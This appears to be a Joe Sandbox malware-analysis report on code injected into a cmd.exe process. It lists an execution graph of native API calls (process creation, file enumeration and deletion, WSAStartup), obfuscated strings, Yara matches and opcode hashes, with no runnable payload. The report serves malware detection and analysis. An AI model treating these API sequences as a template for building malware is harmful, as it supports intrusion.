                                                                        execution_graph 94068 2840480 94069 284049a 94068->94069 94074 2843e60 94069->94074 94071 28404b8 94072 28404ec PostThreadMessageW 94071->94072 94073 28404fd 94071->94073 94072->94073 94075 2843e84 94074->94075 94076 2843e8b 94075->94076 94077 2843ec0 LdrLoadDll 94075->94077 94076->94071 94077->94076 94078 284b880 94080 284b8a9 94078->94080 94079 284b9ad 94080->94079 94081 284b953 FindFirstFileW 94080->94081 94081->94079 94083 284b96e 94081->94083 94082 284b994 FindNextFileW 94082->94083 94084 284b9a6 FindClose 94082->94084 94083->94082 94084->94079 94085 2846800 94086 284681c 94085->94086 94094 284686f 94085->94094 94086->94094 94095 2857a10 94086->94095 94087 2846998 94089 2846837 94098 2845c10 NtClose LdrInitializeThunk 94089->94098 94091 2846972 94091->94087 94100 2845de0 NtClose LdrInitializeThunk LdrInitializeThunk 94091->94100 94094->94087 94099 2845c10 NtClose LdrInitializeThunk 94094->94099 94096 2857a2a 94095->94096 94097 2857a3b NtClose 94096->94097 94097->94089 94098->94094 94099->94091 94100->94087 94101 284f240 94102 284f25d 94101->94102 94103 2843e60 LdrLoadDll 94102->94103 94104 284f27b 94103->94104 94105 28503c1 94117 2857890 94105->94117 94107 28503e2 94108 2850415 94107->94108 94109 2850400 94107->94109 94111 2857a10 NtClose 94108->94111 94110 2857a10 NtClose 94109->94110 94112 2850409 94110->94112 94114 285041e 94111->94114 94113 285044a 94114->94113 94121 2859920 94114->94121 94118 2857929 94117->94118 94120 28578b1 94117->94120 94119 285793f NtReadFile 94118->94119 94119->94107 94120->94107 94124 2857d70 94121->94124 94123 285043e 94125 2857d8d 94124->94125 94126 2857d9e RtlFreeHeap 94125->94126 94126->94123 94127 3142ad0 LdrInitializeThunk 94128 2857040 94129 285705d 94128->94129 94132 3142df0 LdrInitializeThunk 94129->94132 94130 2857085 94132->94130 94133 2850840 94134 285085c 94133->94134 94135 2850884 94134->94135 94136 2850898 94134->94136 94137 2857a10 NtClose 94135->94137 94138 2857a10 NtClose 94136->94138 94139 285088d 94137->94139 94140 28508a1 94138->94140 94143 2859a40 RtlAllocateHeap 94140->94143 94142 28508ac 94143->94142 94149 2842a8c 94154 28471c0 94149->94154 94152 2857a10 NtClose 94153 2842ab1 94152->94153 94155 28471da 94154->94155 94159 2842a9c 94154->94159 94160 2857130 94155->94160 94158 2857a10 NtClose 94158->94159 94159->94152 94159->94153 94161 285714a 94160->94161 94164 31435c0 LdrInitializeThunk 94161->94164 94162 28472aa 94162->94158 94164->94162 94165 284210a 94166 2842138 94165->94166 94169 2845980 94166->94169 94168 2842143 94170 28459b3 94169->94170 94171 28459d7 94170->94171 94176 28575a0 94170->94176 94171->94168 94173 28459fa 94173->94171 94174 2857a10 NtClose 94173->94174 94175 2845a7a 94174->94175 94175->94168 94177 28575bd 94176->94177 94180 3142ca0 LdrInitializeThunk 94177->94180 94178 28575e9 94178->94173 94180->94178 94181 28393d0 94182 28393df 94181->94182 94183 2839420 94182->94183 94184 283940d CreateThread 94182->94184 94185 2845110 94190 2847540 94185->94190 94187 2845140 94189 284516c 94187->94189 94194 28474c0 94187->94194 94191 2847553 94190->94191 94201 2856fa0 94191->94201 94193 284757e 94193->94187 94195 2847504 94194->94195 94196 2847525 94195->94196 94207 2856da0 94195->94207 94196->94187 94198 2847515 94199 2847531 94198->94199 94200 2857a10 NtClose 94198->94200 94199->94187 94200->94196 94202 2857010 94201->94202 94203 2856fc1 94201->94203 94206 3142dd0 LdrInitializeThunk 94202->94206 94203->94193 94204 2857035 94204->94193 94206->94204 94208 2856e12 94207->94208 94209 2856dc4 94207->94209 94212 3144650 LdrInitializeThunk 94208->94212 94209->94198 94210 2856e37 94210->94198 94212->94210 94213 2854a10 94214 2854a6a 94213->94214 94216 2854a77 94214->94216 94217 28525c0 94214->94217 94219 2852601 94217->94219 94218 2852706 94218->94216 94219->94218 94220 2843e60 LdrLoadDll 94219->94220 94222 2852647 94220->94222 94221 2852680 Sleep 94221->94222 94222->94218 94222->94221 94223 2850bd0 94227 2850bdf 94223->94227 94224 2850c69 94225 2850c23 94226 2859920 RtlFreeHeap 94225->94226 94228 2850c33 94226->94228 94227->94224 94227->94225 94229 2850c64 94227->94229 94230 2859920 RtlFreeHeap 94229->94230 94230->94224 94231 2847c1e 94232 2847c23 94231->94232 94233 2847be2 94232->94233 94235 2846650 LdrInitializeThunk LdrInitializeThunk 94232->94235 94235->94233 94236 2846a67 94237 28469f6 94236->94237 94239 2846a42 94236->94239 94237->94239 94240 284a5e0 94237->94240 94241 284a606 94240->94241 94242 284a825 94241->94242 94267 2857e00 94241->94267 94242->94239 94244 284a67c 94244->94242 94270 285ab30 94244->94270 94246 284a698 94246->94242 94247 284a769 94246->94247 94276 2857090 94246->94276 94250 2845090 LdrInitializeThunk 94247->94250 94255 284a788 94247->94255 94250->94255 94251 284a751 94256 2847540 LdrInitializeThunk 94251->94256 94252 284a72f 94298 2853260 LdrInitializeThunk 94252->94298 94253 284a6fd 94253->94242 94253->94251 94253->94252 94280 2845090 94253->94280 94254 284a80d 94261 2847540 LdrInitializeThunk 94254->94261 94255->94254 94283 2856c60 94255->94283 94260 284a75f 94256->94260 94260->94239 94263 284a81b 94261->94263 94262 284a7e4 94288 2856d00 94262->94288 94263->94239 94265 284a7fe 94293 2856e40 94265->94293 94268 2857e1a 94267->94268 94269 2857e2b CreateProcessInternalW 94268->94269 94269->94244 94271 285aaa0 94270->94271 94272 285aafd 94271->94272 94299 2859a00 94271->94299 94272->94246 94274 285aada 94275 2859920 RtlFreeHeap 94274->94275 94275->94272 94277 28570aa 94276->94277 94305 3142c0a 94277->94305 94278 284a6f4 94278->94247 94278->94253 94282 28450ce 94280->94282 94308 2857250 94280->94308 94282->94252 94284 2856ccf 94283->94284 94285 2856c81 94283->94285 94314 31439b0 LdrInitializeThunk 94284->94314 94285->94262 94286 2856cf4 94286->94262 94289 2856d72 94288->94289 94290 2856d24 94288->94290 94315 3144340 LdrInitializeThunk 94289->94315 94290->94265 94291 2856d97 94291->94265 94294 2856eaf 94293->94294 94296 2856e61 94293->94296 94316 3142fb0 LdrInitializeThunk 94294->94316 94295 2856ed4 94295->94254 94296->94254 94298->94251 94302 2857d20 94299->94302 94301 2859a1b 94301->94274 94303 2857d3a 94302->94303 94304 2857d4b RtlAllocateHeap 94303->94304 94304->94301 94306 3142c11 94305->94306 94307 3142c1f LdrInitializeThunk 94305->94307 94306->94278 94307->94278 94309 28572ef 94308->94309 94311 2857271 94308->94311 94313 3142d10 LdrInitializeThunk 94309->94313 94310 2857334 94310->94282 94311->94282 94313->94310 94314->94286 94315->94291 94316->94295 94317 284a0e0 94322 2849e10 94317->94322 94319 284a0ed 94336 2849ab0 94319->94336 94321 284a109 94323 2849e35 94322->94323 94347 2847790 94323->94347 94326 2849f72 94326->94319 94328 2849f89 94328->94319 94329 2849f80 94329->94328 94331 284a071 94329->94331 94362 2849510 94329->94362 94333 284a0c9 94331->94333 94371 2849870 94331->94371 94334 2859920 RtlFreeHeap 94333->94334 94335 284a0d0 94334->94335 94335->94319 94337 2849ac6 94336->94337 94344 2849ad1 94336->94344 94338 2859a00 RtlAllocateHeap 94337->94338 94338->94344 94339 2849ae7 94339->94321 94340 2847790 GetFileAttributesW 94340->94344 94341 2849dde 94342 2849df7 94341->94342 94343 2859920 RtlFreeHeap 94341->94343 94342->94321 94343->94342 94344->94339 94344->94340 94344->94341 94345 2849510 RtlFreeHeap 94344->94345 94346 2849870 RtlFreeHeap 94344->94346 94345->94344 94346->94344 94348 28477b1 94347->94348 94349 28477c3 94348->94349 94350 28477b8 GetFileAttributesW 94348->94350 94349->94326 94351 2851ea0 94349->94351 94350->94349 94352 2851eae 94351->94352 94353 2851eb5 94351->94353 94352->94329 94354 2843e60 LdrLoadDll 94353->94354 94355 2851eea 94354->94355 94356 2851ef9 94355->94356 94375 2851970 LdrLoadDll 94355->94375 94358 2859a00 RtlAllocateHeap 94356->94358 94360 2852094 94356->94360 94361 2851f12 94358->94361 94359 2859920 RtlFreeHeap 94359->94360 94360->94329 94361->94359 94361->94360 94363 2849529 94362->94363 94376 284cd50 94363->94376 94365 284959d 94366 28495bb 94365->94366 94368 2849720 94365->94368 94367 2849705 94366->94367 94381 28493d0 94366->94381 94367->94329 94368->94367 94369 28493d0 RtlFreeHeap 94368->94369 94369->94368 94372 2849896 94371->94372 94373 284cd50 RtlFreeHeap 94372->94373 94374 2849912 94373->94374 94374->94331 94375->94356 94378 284cd5b 94376->94378 94377 284cd73 94377->94365 94378->94377 94379 2859920 RtlFreeHeap 94378->94379 94380 284cdac 94379->94380 94380->94365 94382 28493e6 94381->94382 94385 284cdc0 94382->94385 94384 28494ec 94384->94366 94386 284cde4 94385->94386 94387 284ce7c 94386->94387 94388 2859920 RtlFreeHeap 94386->94388 94387->94384 94388->94387 94389 2849020 94390 2849027 94389->94390 94390->94389 94391 2849048 94390->94391 94392 2859920 RtlFreeHeap 94390->94392 94392->94391 94393 28451a0 94394 28451d6 94393->94394 94395 2857090 LdrInitializeThunk 94393->94395 94395->94394 94396 284e960 94397 284e9c4 94396->94397 94398 2845980 2 API calls 94397->94398 94400 284eaed 94398->94400 94399 284eaf4 94400->94399 94421 2845a90 94400->94421 94402 284eb70 94403 284eca2 94402->94403 94420 284ec93 94402->94420 94425 284e740 94402->94425 94404 2857a10 NtClose 94403->94404 94406 284ecac 94404->94406 94407 284eba5 94407->94403 94408 284ebb0 94407->94408 94409 2859a00 RtlAllocateHeap 94408->94409 94410 284ebd9 94409->94410 94411 284ebe2 94410->94411 94412 284ebf8 94410->94412 94413 2857a10 NtClose 94411->94413 94434 284e630 CoInitialize 94412->94434 94415 284ebec 94413->94415 94416 2857a10 NtClose 94417 284ec8c 94416->94417 94419 2859920 RtlFreeHeap 94417->94419 94418 284ec06 94418->94416 94419->94420 94422 2845ab5 94421->94422 94436 2857390 94422->94436 94426 284e75c 94425->94426 94427 2843e60 LdrLoadDll 94426->94427 94429 284e77a 94427->94429 94428 284e783 94428->94407 94429->94428 94430 2843e60 LdrLoadDll 94429->94430 94431 284e84e 94430->94431 94432 2843e60 LdrLoadDll 94431->94432 94433 284e8ab 94431->94433 94432->94433 94433->94407 94435 284e695 94434->94435 94435->94418 94437 28573aa 94436->94437 94440 3142c60 LdrInitializeThunk 94437->94440 94438 2845b29 94438->94402 94440->94438 94441 2856ee0 94442 2856f64 94441->94442 94443 2856f04 94441->94443 94446 3142ee0 LdrInitializeThunk 94442->94446 94444 2856f95 94446->94444 94447 2839430 94448 28397fc 94447->94448 94449 2839c90 94448->94449 94451 2859590 94448->94451 94452 28595b6 94451->94452 94457 2833db0 94452->94457 94454 28595d5 94455 2859606 94454->94455 94461 2854050 94454->94461 94455->94449 94458 2833db7 94457->94458 94465 2842b90 94458->94465 94460 2833dbd 94460->94454 94462 28540aa 94461->94462 94464 28540b7 94462->94464 94476 2841040 94462->94476 94464->94455 94466 2842ba7 94465->94466 94468 2842bc0 94466->94468 94469 2858450 94466->94469 94468->94460 94471 2858468 94469->94471 94470 285848c 94470->94468 94471->94470 94472 2857090 LdrInitializeThunk 94471->94472 94473 28584e1 94472->94473 94474 2859920 RtlFreeHeap 94473->94474 94475 28584fa 94474->94475 94475->94468 94477 284107b 94476->94477 94494 28472d0 94477->94494 94479 2841083 94480 2859a00 RtlAllocateHeap 94479->94480 94492 2841352 94479->94492 94481 2841099 94480->94481 94482 2859a00 RtlAllocateHeap 94481->94482 94483 28410aa 94482->94483 94484 2859a00 RtlAllocateHeap 94483->94484 94486 28410bb 94484->94486 94493 284114e 94486->94493 94509 28460e0 NtClose LdrInitializeThunk LdrInitializeThunk 94486->94509 94487 2843e60 LdrLoadDll 94488 284130f 94487->94488 94489 284134c 94488->94489 94490 2841344 WSAStartup 94488->94490 94505 2856770 94489->94505 94490->94489 94492->94464 94493->94487 94495 28472fc 94494->94495 94496 28471c0 2 API calls 94495->94496 94497 284731f 94496->94497 94498 2847341 94497->94498 94499 2847329 94497->94499 94501 284735d 94498->94501 94503 2857a10 NtClose 94498->94503 94500 2847334 94499->94500 94502 2857a10 NtClose 94499->94502 94500->94479 94501->94479 94502->94500 94504 2847353 94503->94504 94504->94479 94506 28567ca 94505->94506 94508 28567d7 94506->94508 94510 2841370 94506->94510 94508->94492 94509->94493 94524 28475a0 94510->94524 94512 2841875 94512->94508 94514 2841591 94515 285ab30 2 API calls 94514->94515 94518 28415a6 94515->94518 94516 2841390 94516->94512 94528 285aa00 94516->94528 94517 2847540 LdrInitializeThunk 94520 28415d1 94517->94520 94518->94520 94533 2840000 94518->94533 94520->94512 94520->94517 94521 2840000 LdrInitializeThunk 94520->94521 94521->94520 94522 28416ff 94522->94520 94523 2847540 LdrInitializeThunk 94522->94523 94523->94522 94525 28475ad 94524->94525 94526 28475d5 94525->94526 94527 28475ce SetErrorMode 94525->94527 94526->94516 94527->94526 94529 285aa16 94528->94529 94530 285aa10 94528->94530 94531 2859a00 RtlAllocateHeap 94529->94531 94530->94514 94532 285aa3c 94531->94532 94532->94514 94536 2857c90 94533->94536 94537 2857cad 94536->94537 94540 3142c70 LdrInitializeThunk 94537->94540 94538 2840022 94538->94522 94540->94538 94542 2846430 94543 284645a 94542->94543 94546 2847370 94543->94546 94545 2846484 94547 284738d 94546->94547 94553 2857180 94547->94553 94549 28473dd 94550 28473e4 94549->94550 94551 2857250 LdrInitializeThunk 94549->94551 94550->94545 94552 284740d 94551->94552 94552->94545 94554 2857210 94553->94554 94556 28571a4 94553->94556 94558 3142f30 LdrInitializeThunk 94554->94558 94555 2857249 94555->94549 94556->94549 94558->94555 94565 2857730 94566 28577d9 94565->94566 94568 2857755 94565->94568 94567 28577ef NtCreateFile 94566->94567 94569 2857970 94570 28579dc 94569->94570 94572 2857994 94569->94572 94571 28579f2 NtDeleteFile 94570->94571

                                                                        Executed Functions

                                                                        Function 02839430 Relevance: 25.5, Strings: 20, Instructions: 475COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 2839430-28397fa 1 283980b-2839817 0->1 2 2839819-2839822 1->2 3 283982f-2839847 1->3 4 2839824-2839827 2->4 5 283982d 2->5 6 2839858-2839864 3->6 4->5 5->1 8 2839866-2839878 6->8 9 283987a-2839884 6->9 8->6 10 2839895-283989c 9->10 12 28398c5-28398cc 10->12 13 283989e-28398c3 10->13 14 2839903 12->14 15 28398ce-2839901 12->15 13->10 17 283990a-2839911 14->17 15->12 18 2839913-2839942 17->18 19 2839944-283994b 17->19 18->17 20 2839970-2839979 19->20 21 283994d-2839963 19->21 24 2839bab-2839baf 20->24 25 283997f-2839989 20->25 22 2839965-283996b 21->22 23 283996e 21->23 22->23 23->19 26 2839bb1-2839bdb 24->26 27 2839bdd-2839be7 24->27 28 283999a-28399a3 25->28 26->24 29 2839bf8-2839c01 27->29 30 28399b3-28399b6 28->30 31 28399a5-28399b1 28->31 32 2839c03-2839c0f 29->32 33 2839c1f-2839c29 29->33 34 28399bc-28399c0 30->34 31->28 38 2839c11-2839c17 32->38 39 2839c1d 32->39 40 2839c2b-2839c4a 33->40 41 2839c5d-2839c64 33->41 36 28399c2-28399ed 34->36 37 28399ef-28399f6 34->37 36->34 42 2839a48-2839a52 37->42 43 28399f8-2839a18 37->43 38->39 39->29 45 2839c5b 40->45 46 2839c4c-2839c55 40->46 47 2839c66-2839c6a 41->47 48 2839ccd-2839cd7 41->48 53 2839a54-2839a6e 42->53 54 2839a8a-2839a9a 42->54 51 2839a1a-2839a1e 43->51 52 2839a1f-2839a21 43->52 45->33 46->45 49 2839c8b call 2859590 47->49 50 2839c6c-2839c89 47->50 55 2839ce8-2839cf1 48->55 64 2839c90-2839c97 49->64 50->47 51->52 57 2839a23-2839a2c 52->57 58 2839a32-2839a46 52->58 59 2839a70-2839a74 53->59 60 2839a75-2839a77 53->60 54->54 63 2839a9c-2839aab 54->63 61 2839cf3-2839d05 55->61 62 2839d07-2839d11 55->62 57->58 58->37 59->60 65 2839a79-2839a82 60->65 66 2839a88 60->66 61->55 68 2839d22-2839d2b 62->68 69 2839ab2-2839abc 63->69 70 2839aad 63->70 64->48 72 2839c99-2839ca4 64->72 65->66 66->42 73 2839d41-2839d4b 68->73 74 2839d2d-2839d3f 68->74 71 2839acd-2839ad9 69->71 70->24 76 2839adb-2839aea 71->76 77 2839aec-2839af6 71->77 78 2839ca6-2839caa 72->78 79 2839cab-2839ccb 72->79 75 2839d5c-2839d65 73->75 74->68 81 2839d67-2839d79 75->81 82 2839d7b-2839d85 75->82 76->71 83 2839b07-2839b11 77->83 78->79 79->64 81->75 86 2839b13-2839b1f 83->86 87 2839b21-2839b35 83->87 86->83 88 2839b3b-2839b42 87->88 90 2839b44-2839b4f 88->90 91 2839b7f-2839b83 88->91 94 2839b51-2839b55 90->94 95 2839b56-2839b58 90->95 92 2839ba6 91->92 93 2839b85-2839ba4 91->93 92->20 93->91 94->95 96 2839b5a-2839b63 95->96 97 2839b69-2839b7d 95->97 96->97 97->88
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !<$$$)K$0u$6$;$<2$=POUSH$G$KE$O%$SH$SH$WS$]s$`$w$yP$_$p
                                                                        • API String ID: 0-2178543011
                                                                        • Opcode ID: 0af98ffd33cf2dcfc8b282559c9797877593fdd83a272eee870eff818dde17b6
                                                                        • Instruction ID: 0c497274d458568ede793ccce2242619dd75da04cae966107ae7e4f3a764a56e
                                                                        • Opcode Fuzzy Hash: 0af98ffd33cf2dcfc8b282559c9797877593fdd83a272eee870eff818dde17b6
                                                                        • Instruction Fuzzy Hash: 3D42D3B8D05229CBEB25CF49C894BDDBBB2BB44308F1081D9D50DAB380D7B95A85CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284B880 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0284B964
                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0284B99F
                                                                        • FindClose.KERNELBASE(?), ref: 0284B9AA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: c727bc2ddeb5e29e140db745ae10bd61aed2c37486d980a70e5e443c6427af0a
                                                                        • Instruction ID: 88d8bf6b97f16c3dfed5bd4f1c1b2cb32048682c019d063e570ebaf6414f1e0e
                                                                        • Opcode Fuzzy Hash: c727bc2ddeb5e29e140db745ae10bd61aed2c37486d980a70e5e443c6427af0a
                                                                        • Instruction Fuzzy Hash: 17316079900348ABDB21DF64CC85FFE777DAF44749F144458B908E7180EA70AA848BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857730 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02857820
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 8dadb3bc4527515943091eb7cf00bee8138bee8c7c71347531a93ae71a79c292
                                                                        • Instruction ID: 862ea3a38d58df8cf7e20690cbf400a5c0a2896bee16031582fa6d39dccd7f9c
                                                                        • Opcode Fuzzy Hash: 8dadb3bc4527515943091eb7cf00bee8138bee8c7c71347531a93ae71a79c292
                                                                        • Instruction Fuzzy Hash: 2631C5B9A01218AFCB14DF99D880EEEB7B9EF8C714F108119FD09A3340D734A8518FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857890 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02857968
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 9916b21b4bdda5fda80655f7d16c03d194ed0a1473cb53a12ead11b45d59ac18
                                                                        • Instruction ID: 09bd4e1a6a9cb1e4941a09a9ac5a4e8a6fe993c13407282d266f80b7fcf22856
                                                                        • Opcode Fuzzy Hash: 9916b21b4bdda5fda80655f7d16c03d194ed0a1473cb53a12ead11b45d59ac18
                                                                        • Instruction Fuzzy Hash: 2631BBB5A01219AFCB14DF59D880EEEB7B9EF8C714F108219FD19A7240D630A9118FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857970 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 962d2a74dab1214c9a1136aa92efa52dcb22f80298dc2a9c80ca7797dcda8cd9
                                                                        • Instruction ID: eb9b531b6c96aca32a52ef13b6da3f52b91ec4048c41c264fc595031edf6a1d1
                                                                        • Opcode Fuzzy Hash: 962d2a74dab1214c9a1136aa92efa52dcb22f80298dc2a9c80ca7797dcda8cd9
                                                                        • Instruction Fuzzy Hash: 1C01C47A6012147FD610EB68CC41FAB73ADDB89710F50450AFE0D97280DA74B9118BEA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857A10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02857A44
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: e0e12dddc7c3dbd5bd9251f05ea33240a1d1119dea3cce8cc0d4523f01915727
                                                                        • Instruction ID: 154f0608e35d2a18d7b42372d1ab8fcdf6d09da577a6188be04954e1b82470d3
                                                                        • Opcode Fuzzy Hash: e0e12dddc7c3dbd5bd9251f05ea33240a1d1119dea3cce8cc0d4523f01915727
                                                                        • Instruction Fuzzy Hash: 65E0463A201214BBD620AA59CC40FDB776DDFC5721F018055FA19A7242CA70B9518AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03144340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
                                                                        • Instruction ID: 6ce7136e4b12826ea6027368ac87000907cde3bfe9e6673d0b11a4f4e842c8d0
                                                                        • Opcode Fuzzy Hash: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
                                                                        • Instruction Fuzzy Hash: 9A900231705804539140B2588984546400597E4301B55D011F4525554C8B148A565761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03144650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
                                                                        • Instruction ID: a8f606d087d01ce23ace9c0b1ff2d11b37bdbcc11f8642e00f721ae1e18f05f1
                                                                        • Opcode Fuzzy Hash: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
                                                                        • Instruction Fuzzy Hash: 99900261701504834140B2588904406600597E5301395D115B4655560C871889559669
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
                                                                        • Instruction ID: b291600eb0caed8b045c0a975b2d439aa02b83063ae4520511945c832e0d3592
                                                                        • Opcode Fuzzy Hash: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
                                                                        • Instruction Fuzzy Hash: CF900261302404434105B2588514616400A87E4201B55D021F5115590DC72589916525
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
                                                                        • Instruction ID: 9aef443ac1db2e2968b40ad58808e6a454170c47b25ed9a6f3a3d06227842eb8
                                                                        • Opcode Fuzzy Hash: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
